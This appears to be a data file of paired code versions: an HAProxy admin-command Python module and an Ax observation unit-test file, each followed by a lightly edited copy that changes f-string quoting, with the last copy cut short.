# pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name
"""cmds.py - Implementations of the different HAProxy commands"""
import re
import csv
import json
from io import StringIO
class Cmd():
"""Cmd - Command base class"""
req_args = []
args = {}
cmdTxt = ""
helpTxt = ""
# pylint: disable=unused-argument
def __init__(self, *args, **kwargs):
"""Argument to the command are given in kwargs only. We ignore *args."""
self.args = kwargs
valid_kwargs = [k for (k, v) in kwargs.items() if v is not None]
if not all([a in valid_kwargs for a in self.req_args]):
raise Exception(f"Wrong number of arguments. Required arguments are: {self.WhatArgs()}")
def WhatArgs(self):
"""Returns a formatted string of arguments to this command."""
return ",".join(self.req_args)
@classmethod
def getHelp(cls):
"""Get formatted help string for this command."""
txtArgs = ",".join(cls.req_args)
if not txtArgs:
txtArgs = "None"
return " ".join((cls.helpTxt, "Arguments: %s" % txtArgs))
def getCmd(self):
"""Gets the command line for this command.
The default behavior is to apply the args dict to cmdTxt
"""
return self.cmdTxt % self.args
def getResult(self, res):
"""Returns raw results gathered from HAProxy"""
if res == '\n':
res = None
return res
def getResultObj(self, res):
"""Returns refined output from HAProxy, packed inside a Python obj i.e. a dict()"""
return res
class setServerAgent(Cmd):
"""Set server agent command."""
cmdTxt = "set server %(backend)s/%(server)s agent %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's agent to a new state."
class setServerHealth(Cmd):
"""Set server health command."""
cmdTxt = "set server %(backend)s/%(server)s health %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's health to a new state."
class setServerState(Cmd):
"""Set server state command."""
cmdTxt = "set server %(backend)s/%(server)s state %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's administrative state to a new state."
class setServerWeight(Cmd):
"""Set server weight command."""
cmdTxt = "set server %(backend)s/%(server)s weight %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's weight to a new state."
class showFBEnds(Cmd):
"""Base class for getting a listing Frontends and Backends"""
switch = ""
cmdTxt = "show stat\r\n"
def getResult(self, res):
return "\n".join(self._getResult(res))
def getResultObj(self, res):
return self._getResult(res)
def _getResult(self, res):
"""Show Frontend/Backends. To do this, we extract info from
the stat command and filter out by a specific
switch (FRONTEND/BACKEND)"""
if not self.switch:
raise Exception("No action specified")
result = []
lines = res.split('\n')
cl = re.compile("^[^,].+," + self.switch.upper() + ",.*$")
for e in lines:
me = re.match(cl, e)
if me:
result.append(e.split(",")[0])
return result
class showFrontends(showFBEnds):
"""Show frontends command."""
switch = "frontend"
helpTxt = "List all Frontends."
class showBackends(showFBEnds):
"""Show backends command."""
switch = "backend"
helpTxt = "List all Backends."
class showInfo(Cmd):
"""Show info HAProxy command"""
cmdTxt = "show info\r\n"
helpTxt = "Show info on HAProxy instance."
def getResultObj(self, res):
resDict = {}
for line in res.split('\n'):
k, v = line.split(':')
resDict[k] = v
return resDict
class showSessions(Cmd):
"""Show sess HAProxy command"""
cmdTxt = "show sess\r\n"
helpTxt = "Show HAProxy sessions."
def getResultObj(self, res):
return res.split('\n')
class baseStat(Cmd):
"""Base class for stats commands."""
def getDict(self, res):
# clean response
res = re.sub(r'^# ', '', res, re.MULTILINE)
res = re.sub(r',\n', '\n', res, re.MULTILINE)
res = re.sub(r',\n\n', '\n', res, re.MULTILINE)
csv_string = StringIO(res)
return csv.DictReader(csv_string, delimiter=',')
def getBootstrapOutput(self, **kwargs):
rows = kwargs['rows']
# search
if kwargs['search']:
filtered_rows = []
for row in rows:
def inner(row):
for k, v in row.items():
if kwargs['search'] in v:
return row
return None
match = inner(row)
if match:
filtered_rows.append(match)
rows = filtered_rows
# sort
rows.sort(key=lambda k: k[kwargs['sort_col']], reverse=True if kwargs['sort_dir'] == 'desc' else False)
# pager
total = len(rows)
pages = [rows[i:i + kwargs['page_rows']] for i in range(0, total, kwargs['page_rows'])]
if pages and (kwargs['page'] > len(pages) or kwargs['page'] < 1):
raise KeyError(f"Current page {kwargs["page"]} does not exist. Available pages: {len(pages)}")
page = pages[kwargs['page'] - 1] if pages else []
return json.dumps({
"rows": page,
"total": total,
"rowCount": kwargs['page_rows'],
"current": kwargs['page']
})
class showServers(baseStat):
"""Show all servers. If backend is given, show only servers for this backend. """
cmdTxt = "show stat\r\n"
helpTxt = "Lists all servers. Filter for servers in backend, if set."
def getResult(self, res):
if self.args['output'] == 'json':
return json.dumps(self.getResultObj(res))
if self.args['output'] == 'bootstrap':
rows = self.getResultObj(res)
args = {
"rows": rows,
"page": int(self.args['page']) if self.args['page'] != None else 1,
"page_rows": int(self.args['page_rows']) if self.args['page_rows'] != None else len(rows),
"search": self.args['search'],
"sort_col": self.args['sort_col'] if self.args['sort_col'] else 'id',
"sort_dir": self.args['sort_dir'],
}
return self.getBootstrapOutput(**args)
return self.getResultObj(res)
def getResultObj(self, res):
servers = []
reader = self.getDict(res)
for row in reader:
# show only server
if row['svname'] in ['BACKEND', 'FRONTEND']:
continue
# filter server for given backend
if self.args['backend'] and row['pxname'] != self.args['backend']:
continue
# add id
row['id'] = f"{row["pxname"]}/{row["svname"]}"
row.move_to_end('id', last=False)
servers.append(dict(row))
return servers
| # pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name
"""cmds.py - Implementations of the different HAProxy commands"""
import re
import csv
import json
from io import StringIO
class Cmd():
"""Cmd - Command base class"""
req_args = []
args = {}
cmdTxt = ""
helpTxt = ""
# pylint: disable=unused-argument
def __init__(self, *args, **kwargs):
"""Argument to the command are given in kwargs only. We ignore *args."""
self.args = kwargs
valid_kwargs = [k for (k, v) in kwargs.items() if v is not None]
if not all([a in valid_kwargs for a in self.req_args]):
raise Exception(f"Wrong number of arguments. Required arguments are: {self.WhatArgs()}")
def WhatArgs(self):
"""Returns a formatted string of arguments to this command."""
return ",".join(self.req_args)
@classmethod
def getHelp(cls):
"""Get formatted help string for this command."""
txtArgs = ",".join(cls.req_args)
if not txtArgs:
txtArgs = "None"
return " ".join((cls.helpTxt, "Arguments: %s" % txtArgs))
def getCmd(self):
"""Gets the command line for this command.
The default behavior is to apply the args dict to cmdTxt
"""
return self.cmdTxt % self.args
def getResult(self, res):
"""Returns raw results gathered from HAProxy"""
if res == '\n':
res = None
return res
def getResultObj(self, res):
"""Returns refined output from HAProxy, packed inside a Python obj i.e. a dict()"""
return res
class setServerAgent(Cmd):
"""Set server agent command."""
cmdTxt = "set server %(backend)s/%(server)s agent %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's agent to a new state."
class setServerHealth(Cmd):
"""Set server health command."""
cmdTxt = "set server %(backend)s/%(server)s health %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's health to a new state."
class setServerState(Cmd):
"""Set server state command."""
cmdTxt = "set server %(backend)s/%(server)s state %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's administrative state to a new state."
class setServerWeight(Cmd):
"""Set server weight command."""
cmdTxt = "set server %(backend)s/%(server)s weight %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's weight to a new state."
class showFBEnds(Cmd):
"""Base class for getting a listing Frontends and Backends"""
switch = ""
cmdTxt = "show stat\r\n"
def getResult(self, res):
return "\n".join(self._getResult(res))
def getResultObj(self, res):
return self._getResult(res)
def _getResult(self, res):
"""Show Frontend/Backends. To do this, we extract info from
the stat command and filter out by a specific
switch (FRONTEND/BACKEND)"""
if not self.switch:
raise Exception("No action specified")
result = []
lines = res.split('\n')
cl = re.compile("^[^,].+," + self.switch.upper() + ",.*$")
for e in lines:
me = re.match(cl, e)
if me:
result.append(e.split(",")[0])
return result
class showFrontends(showFBEnds):
"""Show frontends command."""
switch = "frontend"
helpTxt = "List all Frontends."
class showBackends(showFBEnds):
"""Show backends command."""
switch = "backend"
helpTxt = "List all Backends."
class showInfo(Cmd):
"""Show info HAProxy command"""
cmdTxt = "show info\r\n"
helpTxt = "Show info on HAProxy instance."
def getResultObj(self, res):
resDict = {}
for line in res.split('\n'):
k, v = line.split(':')
resDict[k] = v
return resDict
class showSessions(Cmd):
"""Show sess HAProxy command"""
cmdTxt = "show sess\r\n"
helpTxt = "Show HAProxy sessions."
def getResultObj(self, res):
return res.split('\n')
class baseStat(Cmd):
"""Base class for stats commands."""
def getDict(self, res):
# clean response
res = re.sub(r'^# ', '', res, re.MULTILINE)
res = re.sub(r',\n', '\n', res, re.MULTILINE)
res = re.sub(r',\n\n', '\n', res, re.MULTILINE)
csv_string = StringIO(res)
return csv.DictReader(csv_string, delimiter=',')
def getBootstrapOutput(self, **kwargs):
rows = kwargs['rows']
# search
if kwargs['search']:
filtered_rows = []
for row in rows:
def inner(row):
for k, v in row.items():
if kwargs['search'] in v:
return row
return None
match = inner(row)
if match:
filtered_rows.append(match)
rows = filtered_rows
# sort
rows.sort(key=lambda k: k[kwargs['sort_col']], reverse=True if kwargs['sort_dir'] == 'desc' else False)
# pager
total = len(rows)
pages = [rows[i:i + kwargs['page_rows']] for i in range(0, total, kwargs['page_rows'])]
if pages and (kwargs['page'] > len(pages) or kwargs['page'] < 1):
raise KeyError(f"Current page {kwargs['page']} does not exist. Available pages: {len(pages)}")
page = pages[kwargs['page'] - 1] if pages else []
return json.dumps({
"rows": page,
"total": total,
"rowCount": kwargs['page_rows'],
"current": kwargs['page']
})
class showServers(baseStat):
"""Show all servers. If backend is given, show only servers for this backend. """
cmdTxt = "show stat\r\n"
helpTxt = "Lists all servers. Filter for servers in backend, if set."
def getResult(self, res):
if self.args['output'] == 'json':
return json.dumps(self.getResultObj(res))
if self.args['output'] == 'bootstrap':
rows = self.getResultObj(res)
args = {
"rows": rows,
"page": int(self.args['page']) if self.args['page'] != None else 1,
"page_rows": int(self.args['page_rows']) if self.args['page_rows'] != None else len(rows),
"search": self.args['search'],
"sort_col": self.args['sort_col'] if self.args['sort_col'] else 'id',
"sort_dir": self.args['sort_dir'],
}
return self.getBootstrapOutput(**args)
return self.getResultObj(res)
def getResultObj(self, res):
servers = []
reader = self.getDict(res)
for row in reader:
# show only server
if row['svname'] in ['BACKEND', 'FRONTEND']:
continue
# filter server for given backend
if self.args['backend'] and row['pxname'] != self.args['backend']:
continue
# add id
row['id'] = f"{row['pxname']}/{row['svname']}"
row.move_to_end('id', last=False)
servers.append(dict(row))
return servers
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
from unittest.mock import Mock, PropertyMock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import TrialStatus
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.generator_run import GeneratorRun
from ax.core.map_data import MapData, MapKeyInfo
from ax.core.observation import (
Observation,
ObservationData,
ObservationFeatures,
observations_from_data,
observations_from_map_data,
separate_observations,
)
from ax.core.trial import Trial
from ax.utils.common.testutils import TestCase
class ObservationsTest(TestCase):
def testObservationFeatures(self):
t = np.datetime64("now")
attrs = {
"parameters": {"x": 0, "y": "a"},
"trial_index": 2,
"start_time": t,
"end_time": t,
"random_split": 1,
}
obsf = ObservationFeatures(**attrs)
for k, v in attrs.items():
self.assertEqual(getattr(obsf, k), v)
printstr = "ObservationFeatures(parameters={'x': 0, 'y': 'a'}, "
printstr += "trial_index=2, "
printstr += "start_time={t}, end_time={t}, ".format(t=t)
printstr += "random_split=1)"
self.assertEqual(repr(obsf), printstr)
obsf2 = ObservationFeatures(**attrs)
self.assertEqual(hash(obsf), hash(obsf2))
a = {obsf, obsf2}
self.assertEqual(len(a), 1)
self.assertEqual(obsf, obsf2)
attrs.pop("trial_index")
obsf3 = ObservationFeatures(**attrs)
self.assertNotEqual(obsf, obsf3)
self.assertFalse(obsf == 1)
def testClone(self):
# Test simple cloning.
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertIsNot(obsf, obsf.clone())
self.assertEqual(obsf, obsf.clone())
# Test cloning with swapping parameters.
clone_with_new_params = obsf.clone(replace_parameters={"x": 1, "y": "b"})
self.assertNotEqual(obsf, clone_with_new_params)
obsf.parameters = {"x": 1, "y": "b"}
self.assertEqual(obsf, clone_with_new_params)
def testObservationFeaturesFromArm(self):
arm = Arm({"x": 0, "y": "a"})
obsf = ObservationFeatures.from_arm(arm, trial_index=3)
self.assertEqual(obsf.parameters, arm.parameters)
self.assertEqual(obsf.trial_index, 3)
def testUpdateFeatures(self):
parameters = {"x": 0, "y": "a"}
new_parameters = {"z": "foo"}
obsf = ObservationFeatures(parameters=parameters, trial_index=3)
# Ensure None trial_index doesn't override existing value
obsf.update_features(ObservationFeatures(parameters={}))
self.assertEqual(obsf.trial_index, 3)
# Test override
new_obsf = ObservationFeatures(
parameters=new_parameters,
trial_index=4,
start_time=pd.Timestamp("2005-02-25"),
end_time=pd.Timestamp("2005-02-26"),
random_split=7,
)
obsf.update_features(new_obsf)
self.assertEqual(obsf.parameters, {**parameters, **new_parameters})
self.assertEqual(obsf.trial_index, 4)
self.assertEqual(obsf.random_split, 7)
self.assertEqual(obsf.start_time, pd.Timestamp("2005-02-25"))
self.assertEqual(obsf.end_time, pd.Timestamp("2005-02-26"))
def testObservationData(self):
attrs = {
"metric_names": ["a", "b"],
"means": np.array([4.0, 5.0]),
"covariance": np.array([[1.0, 4.0], [3.0, 6.0]]),
}
obsd = ObservationData(**attrs)
self.assertEqual(obsd.metric_names, attrs["metric_names"])
self.assertTrue(np.array_equal(obsd.means, attrs["means"]))
self.assertTrue(np.array_equal(obsd.covariance, attrs["covariance"]))
# use legacy printing for numpy (<= 1.13 add spaces in front of floats;
# to get around tests failing on older versions, peg version to 1.13)
if np.__version__ >= "1.14":
np.set_printoptions(legacy="1.13")
printstr = "ObservationData(metric_names=['a', 'b'], means=[ 4. 5.], "
printstr += "covariance=[[ 1. 4.]\n [ 3. 6.]])"
self.assertEqual(repr(obsd), printstr)
self.assertEqual(obsd.means_dict, {"a": 4.0, "b": 5.0})
self.assertEqual(
obsd.covariance_matrix,
{"a": {"a": 1.0, "b": 4.0}, "b": {"a": 3.0, "b": 6.0}},
)
def testObservationDataValidation(self):
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
with self.assertRaises(ValueError):
ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([1.0, 4.0]),
)
def testObservationDataEq(self):
od1 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od2 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[1.0, 4.0], [3.0, 6.0]]),
)
od3 = ObservationData(
metric_names=["a", "b"],
means=np.array([4.0, 5.0]),
covariance=np.array([[2.0, 4.0], [3.0, 6.0]]),
)
self.assertEqual(od1, od2)
self.assertNotEqual(od1, od3)
self.assertFalse(od1 == 1)
def testObservation(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
self.assertEqual(obs.arm_name, "0_0")
obs2 = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertEqual(obs, obs2)
obs3 = Observation(
features=ObservationFeatures(parameters={"x": 10}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
self.assertNotEqual(obs, obs3)
self.assertNotEqual(obs, 1)
def testObservationsFromData(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a"]],
"means": [np.array([2.0, 4.0]), np.array([3])],
"covariance": [np.diag([4.0, 16.0]), np.array([[9.0]])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testObservationsFromDataWithFidelities(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.5}),
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"fidelities": json.dumps({"z": 0.25}),
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"fidelities": json.dumps({"z": 1}),
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "fidelities"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
def testObservationsFromMapData(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
0.25: {
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
1: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for _, obs in truth.items()
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name", "z", "timestamp"]
]
data = MapData(
df=df,
map_key_infos=[
MapKeyInfo(key="z", default_value=0.0),
MapKeyInfo(key="timestamp", default_value=0.0),
],
)
observations = observations_from_map_data(experiment, data)
self.assertEqual(len(observations), 3)
for obs in observations:
t = truth[obs.features.parameters["z"]]
self.assertEqual(obs.features.parameters, t["updated_parameters"])
self.assertEqual(obs.features.trial_index, t["trial_index"])
self.assertEqual(obs.data.metric_names, [t["metric_name"]])
self.assertTrue(np.array_equal(obs.data.means, t["mean_t"]))
self.assertTrue(np.array_equal(obs.data.covariance, t["covariance_t"]))
self.assertEqual(obs.arm_name, t["arm_name"])
self.assertEqual(obs.features.metadata, {"timestamp": t["timestamp"]})
def testObservationsFromDataAbandoned(self):
truth = {
0.5: {
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
"updated_parameters": {"x": 0, "y": "a", "z": 0.5},
"mean_t": np.array([2.0]),
"covariance_t": np.array([[4.0]]),
"z": 0.5,
"timestamp": 50,
},
1: {
"arm_name": "1_0",
"parameters": {"x": 0, "y": "a", "z": 1},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"updated_parameters": {"x": 0, "y": "a", "z": 1},
"mean_t": np.array([4.0]),
"covariance_t": np.array([[16.0]]),
"z": 1,
"timestamp": 100,
},
0.25: {
"arm_name": "2_0",
"parameters": {"x": 1, "y": "a", "z": 0.5},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.25},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.25,
"timestamp": 25,
},
0.75: {
"arm_name": "2_1",
"parameters": {"x": 1, "y": "b", "z": 0.75},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"updated_parameters": {"x": 1, "y": "b", "z": 0.75},
"mean_t": np.array([3.0]),
"covariance_t": np.array([[9.0]]),
"z": 0.75,
"timestamp": 25,
},
}
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for _, obs in truth.items()
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: (
Trial(experiment, GeneratorRun(arms=[arms[obs["arm_name"]]]))
)
for _, obs in list(truth.items())[:-1]
if not obs["arm_name"].startswith("2")
}
batch = BatchTrial(experiment, GeneratorRun(arms=[arms["2_0"], arms["2_1"]]))
trials.update({2: batch})
trials.get(1).mark_abandoned()
trials.get(2).mark_arm_abandoned(arm_name="2_1")
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(list(truth.values()))[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_no_abandoned = observations_from_data(experiment, data)
self.assertEqual(len(obs_no_abandoned), 2)
# 1 arm is abandoned and 1 trial is abandoned, so only 2 observations should be
# included.
obs_with_abandoned = observations_from_data(
experiment, data, include_abandoned=True
)
self.assertEqual(len(obs_with_abandoned), 4)
def testObservationsFromDataWithSomeMissingTimes(self):
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 1,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 2,
"metric_name": "a",
"start_time": 0,
},
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 4.0,
"sem": 4.0,
"trial_index": 1,
"metric_name": "b",
"start_time": None,
},
{
"arm_name": "0_1",
"parameters": {"x": 1, "y": "b"},
"mean": 5.0,
"sem": 5.0,
"trial_index": 2,
"metric_name": "b",
"start_time": None,
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment, GeneratorRun(arms=[arms[obs["arm_name"]]])
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name", "start_time"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
self.assertEqual(len(observations), 2)
# Get them in the order we want for tests below
if observations[0].features.parameters["x"] == 1:
observations.reverse()
obsd_truth = {
"metric_names": [["a", "b"], ["a", "b"]],
"means": [np.array([2.0, 4.0]), np.array([3.0, 5.0])],
"covariance": [np.diag([4.0, 16.0]), np.diag([9.0, 25.0])],
}
cname_truth = ["0_0", "0_1"]
for i, obs in enumerate(observations):
self.assertEqual(obs.features.parameters, truth[i]["parameters"])
self.assertEqual(obs.features.trial_index, truth[i]["trial_index"])
self.assertEqual(obs.data.metric_names, obsd_truth["metric_names"][i])
self.assertTrue(np.array_equal(obs.data.means, obsd_truth["means"][i]))
self.assertTrue(
np.array_equal(obs.data.covariance, obsd_truth["covariance"][i])
)
self.assertEqual(obs.arm_name, cname_truth[i])
def testSeparateObservations(self):
obs = Observation(
features=ObservationFeatures(parameters={"x": 20}),
data=ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
arm_name="0_0",
)
obs_feats, obs_data = separate_observations(observations=[obs])
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
obs_feats, obs_data = separate_observations(observations=[obs], copy=True)
self.assertEqual(obs.features, ObservationFeatures(parameters={"x": 20}))
self.assertEqual(
obs.data,
ObservationData(
means=np.array([1]), covariance=np.array([[2]]), metric_names=["a"]
),
)
def testObservationsWithCandidateMetadata(self):
SOME_METADATA_KEY = "metadatum"
truth = [
{
"arm_name": "0_0",
"parameters": {"x": 0, "y": "a"},
"mean": 2.0,
"sem": 2.0,
"trial_index": 0,
"metric_name": "a",
},
{
"arm_name": "1_0",
"parameters": {"x": 1, "y": "b"},
"mean": 3.0,
"sem": 3.0,
"trial_index": 1,
"metric_name": "a",
},
]
arms = {
obs["arm_name"]: Arm(name=obs["arm_name"], parameters=obs["parameters"])
for obs in truth
}
experiment = Mock()
experiment._trial_indices_by_status = {status: set() for status in TrialStatus}
trials = {
obs["trial_index"]: Trial(
experiment,
GeneratorRun(
arms=[arms[obs["arm_name"]]],
candidate_metadata_by_arm_signature={
arms[obs["arm_name"]].signature: {
SOME_METADATA_KEY: f"value_{obs["trial_index"]}"
}
},
),
)
for obs in truth
}
type(experiment).arms_by_name = PropertyMock(return_value=arms)
type(experiment).trials = PropertyMock(return_value=trials)
df = pd.DataFrame(truth)[
["arm_name", "trial_index", "mean", "sem", "metric_name"]
]
data = Data(df=df)
observations = observations_from_data(experiment, data)
for observation in observations:
self.assertEqual(
observation.features.metadata.get(SOME_METADATA_KEY),
f"value_{observation.features.trial_index}",
)
| #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
from unittest.mock import Mock, PropertyMock
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import TrialStatus
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.generator_run import GeneratorRun
from ax.core.map_data import MapData, MapKeyInfo
from ax.core.observation import (
Observation,
ObservationData,
ObservationFeatures,
observations_from_data,
observations_from_map_data,
separate_observations,
)
from ax.core.trial import Trial
from ax.utils.common.testutils import TestCase
class ObservationsTest(TestCase):
def testObservationFeatures(self):
t = np.datetime64("now")
attrs = {
"parameters": {"x": 0, "y": "a"},
"trial_index": 2,
"start_time": t,
"end_time": t,
"random_split": 1,
}
obsf = ObservationFeatures(**attrs)
for k, v in attrs.items():
self.assertEqual(getattr(obsf, k), v)
printstr = "ObservationFeatures(parameters={'x': 0, 'y': 'a'}, "
printstr += "trial_index=2, "
printstr += "start_time={t}, end_time={t}, ".format(t=t)
printstr += "random_split=1)"
